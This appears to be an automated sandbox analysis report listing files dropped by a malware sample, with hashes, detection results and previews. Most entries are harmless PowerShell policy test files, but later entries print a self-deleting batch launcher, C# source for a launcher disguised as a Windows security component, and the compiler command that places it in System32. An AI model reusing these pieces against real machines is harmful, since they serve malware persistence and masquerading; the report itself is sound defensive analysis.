                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mx1m013d.4az.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oajg5iwf.5bv.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ojug1hzg.5kc.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_owwczpqo.rbb.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oxuwn13e.sup.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ozp15qlg.w2q.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rmoblbup.x1m.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_snuia2x0.crs.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sy4qqrec.srw.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tkrgs5gi.bxw.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tomertjk.j0k.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vdew1eyj.ojr.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ybb2nnrh.euk.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zbqzvupb.44m.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\gMEBPrHPbx.bat

                                                                                            Download File
                                                                                            Process:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):219
                                                                                            Entropy (8bit):5.2740951391146185
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:hCijTg3Nou1SV+DE1WD5tjO+v/GkbKOZG1wkn23fV4qRH:HTg9uYDEoE+vukffdjRH
                                                                                            MD5:F7D1DFE186B46D8CBE8DA1B93F6B57F9
                                                                                            SHA1:EB24D7D82E216C560F689373ECE0BB5D20396C41
                                                                                            SHA-256:93B33889B7F9494A68A564B17F50F96AD7ABD9434B0FE69AFE374A0DC5C39A1A
                                                                                            SHA-512:A9702515082B27B528A993F0D85D0E666EA2B7EA9618F3D3BAD7CBAC3AE7D8C4679C92B0B8E0E3A36156721D489021358024201115C672A0A94CAA41FC9FE58F
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\gMEBPrHPbx.bat"

                                                                                            C:\Users\user\AppData\Local\Temp\ih0xhhgm\ih0xhhgm.0.cs

                                                                                            Download File
                                                                                            Process:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                            Category:dropped
                                                                                            Size (bytes):413
                                                                                            Entropy (8bit):5.069760832258539
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLexvukSiFkD:JNVQIbSfhV7TiFkMSfhCPFkD
                                                                                            MD5:67607BE86374B43070C8B7708B054E33
                                                                                            SHA1:C77DEBEAC6C37A3FB5E7929A165C09639291CF24
                                                                                            SHA-256:D97AC456514E0CEB74B7687C12F18392C0EA4A1F4EF3CFCADCEDD106C2F9C099
                                                                                            SHA-512:CA1871CF61B3210F7EDEF47B0272F6032945612ADD930DE82DA18045F1A58FCFF185EDE158847ED8ACB034E40433EA8D3484202DA193402F3CF90E87AF4B7B63
                                                                                            Malicious:false
                                                                                            Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Users\All Users\SoftwareDistribution\nFQRHbQjcuhfqIAubZpdQD.exe"); } catch { } }).Start();. }.}.

                                                                                            C:\Users\user\AppData\Local\Temp\ih0xhhgm\ih0xhhgm.cmdline

                                                                                            Download File
                                                                                            Process:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):250
                                                                                            Entropy (8bit):5.0654503615195
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23fgqFIyLBH:Hu7L//TRq79cQWfI+jLx
                                                                                            MD5:D59F7FE577D0D3A5BD463DCB30D69EA2
                                                                                            SHA1:7CCA45FA81463A83CCEA65DF7486B1FCBA45A58C
                                                                                            SHA-256:05C18A07A3614B94491EFF9DE639C250227CD7F2DE86D178C1846266633EA1FC
                                                                                            SHA-512:5B1C2555E291020CF938761C9919BA8C7D976306D91A24F22BEB6021322A2B386526E960DFFA63BFDBB161E40215C55414D6B3C1E9057681EACB3336E9A8DD87
                                                                                            Malicious:true
                                                                                            Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\ih0xhhgm\ih0xhhgm.0.cs"

                                                                                            C:\Users\user\AppData\Local\Temp\ih0xhhgm\ih0xhhgm.out

                                                                                            Download File
                                                                                            Process:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (329), with CRLF, CR line terminators
                                                                                            Category:modified
                                                                                            Size (bytes):750
                                                                                            Entropy (8bit):5.23872345578511
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:50fMI/u7L//TRq79cQWfI+jLUKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:5vI/un/Vq79tWfIqUKax5DqBVKVrdFAw
                                                                                            MD5:70EB0792F50BD1F3C35D41442AB289F9
                                                                                            SHA1:53A5F68A99CA108D7D7F40AA75931B12A3F4C11C
                                                                                            SHA-256:D51B2164A0C3B8F2DFD83FDE09D6E3A80180605E63B2A174BEA0CB54B6871C0C
                                                                                            SHA-512:55E4CD12963EDF47138E0206A33F6238DA9722D8CE1FE280E6E9D6A5712F0DF25E43765BDF6C748301DF35BE1373307845D41C92D56877F3766CDF2AEB12A45C
                                                                                            Malicious:false
                                                                                            Preview:.C:\hyperContaineragent> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\ih0xhhgm\ih0xhhgm.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                            C:\Users\user\Desktop\EEEoXuLc.log

                                                                                            Download File
                                                                                            Process:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):23552
                                                                                            Entropy (8bit):5.519109060441589
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                            MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                            SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                            SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                            SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                                                            Joe Sandbox View:
                                                                                            • Filename: TGh6AUbQkh.exe, Detection: malicious, Browse
                                                                                            • Filename: k1iZHyRK6K.exe, Detection: malicious, Browse
                                                                                            • Filename: VfKk5EmvwW.exe, Detection: malicious, Browse
                                                                                            • Filename: cGZV10VyWC.exe, Detection: malicious, Browse
                                                                                            • Filename: PbfYaIvR5B.exe, Detection: malicious, Browse
                                                                                            • Filename: 9D7RwuJrth.exe, Detection: malicious, Browse
                                                                                            • Filename: qZoQEFZUnv.exe, Detection: malicious, Browse
                                                                                            • Filename: 01YP9Lwum8.exe, Detection: malicious, Browse
                                                                                            • Filename: w49A5FG3yg.exe, Detection: malicious, Browse
                                                                                            • Filename: 9XHFe6y4Dj.exe, Detection: malicious, Browse
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                            C:\Users\user\Desktop\WWLLRmVS.log

                                                                                            Download File
                                                                                            Process:C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):32256
                                                                                            Entropy (8bit):5.631194486392901
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                            MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                            SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                            SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                            SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 24%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                            C:\Users\user\Desktop\izhrsOEp.log

                                                                                            Download File
                                                                                            Process:C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):23552
                                                                                            Entropy (8bit):5.519109060441589
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                            MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                            SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                            SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                            SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                            C:\Users\user\Desktop\tYJQSSrA.log

                                                                                            Download File
                                                                                            Process:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):32256
                                                                                            Entropy (8bit):5.631194486392901
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                            MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                            SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                            SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                            SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 24%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                            C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):55
                                                                                            Entropy (8bit):4.306461250274409
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                            Malicious:false
                                                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                            C:\Windows\System32\CSCA1C1A0ABC4644F3ABFA5FB833E2CF3E.TMP

                                                                                            Download File
                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                            File Type:MSVC .res
                                                                                            Category:dropped
                                                                                            Size (bytes):1224
                                                                                            Entropy (8bit):4.435108676655666
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                                            MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                                            SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                                            SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                                            SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                                            Malicious:false
